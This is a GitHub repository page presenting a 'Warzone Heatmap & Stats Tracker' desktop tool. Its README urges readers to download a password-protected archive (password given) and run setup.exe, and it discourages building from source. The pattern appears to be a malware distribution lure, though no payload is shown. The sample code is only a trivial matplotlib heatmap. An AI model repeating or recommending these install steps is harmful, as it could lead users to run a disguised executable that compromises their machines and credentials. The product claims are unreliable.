Skip to content

Call of Duty Warzone - Heatmap & Stats Tracker is a powerful desktop tool designed to analyze drop zones, PvP hotspots, and movement patterns in Warzone. The software provides real-time heatmaps, survival rate analysis, and popular player routes, helping users optimize their in-game strategies.

Notifications You must be signed in to change notification settings

sbarrientoss/Call-of-Duty-Warzone-Heatmap-Stats-Tracker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🚀 Call of Duty Warzone - Heatmap & Stats Tracker

📌 Description

Warzone Heatmap & Stats Tracker is a desktop application designed to analyze drop zones, PvP hotspots, and movement patterns in Call of Duty: Warzone.
The software generates heatmaps based on cloud data to help players optimize their landing strategies and survival chances.

🔹 Supported maps: Verdansk, Rebirth Island, Caldera, Fortune’s Keep
🔹 Data sources: Cloud storage, replay files, Warzone API
🔹 Analytics: PvP hotspots, survival rates, winning zones, popular routes


🎯 Features

Live cloud data updates
Heatmap generation for drop & PvP zones
Highlighting high-kill and survival areas
Tracking popular movement routes
Filtering by game mode, season, and events


📥 Installation & Launch

🔹 ✅ RECOMMENDED METHOD (Windows .exe)

1️⃣ Download and extract archive(pass: Project12!)
2️⃣ Run setup.exe
🚀 The application will set up everything automatically, just enjoy!

⚠️ Important: This method is faster and requires no manual setup!


🔹 ❌ COMPLEX METHOD (For Developers Only)

This method is NOT recommended as it requires installing multiple dependencies manually.
Only use this if you know what you're doing!

1️⃣ Manually install dependencies

pip install numpy matplotlib PyQt5 requests folium

2️⃣ Launch with manual settings

export PYTHONPATH=$(pwd)/src
python src/main.py --use-cloud-data --debug-mode --force-render

This method is harder, prone to errors, and requires manual configuration.
💡 Just use the .exe, it handles everything automatically!


🖥 User Interface

🔹 Main window with a Warzone interactive heatmap
🔹 Control panel for heatmap customization & filters
🔹 Filtering based on kills, survival rate, drop zones

Example code for generating a heatmap:

import numpy as np
import matplotlib.pyplot as plt

def generate_heatmap(data):
    heatmap, xedges, yedges = np.histogram2d(data[:,0], data[:,1], bins=(100,100))
    plt.imshow(heatmap.T, origin='lower', cmap='hot', alpha=0.75)
    plt.colorbar(label="Players")
    plt.title("Warzone Heatmap")
    plt.show()

🖼 Examples

📌 Heatmap of drop zones & PvP activity:
Heatmap

📌 Survival rate analysis:
Survival Stats


🔗 Data Sources

The application supports cloud-based data updates for real-time tracking.
Example JSON file with drop zone data:

[
    {"player": "User1", "event": "Drop", "map": "Verdansk", "x": 1523, "y": 3892},
    {"player": "User2", "event": "Kill", "map": "Caldera", "x": 4023, "y": 2157}
]

🤝 Support & Contact

📌 Join the community for updates and assistance!
📧 Email: [email protected]

About

Call of Duty Warzone - Heatmap & Stats Tracker is a powerful desktop tool designed to analyze drop zones, PvP hotspots, and movement patterns in Warzone. The software provides real-time heatmaps, survival rate analysis, and popular player routes, helping users optimize their in-game strategies.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published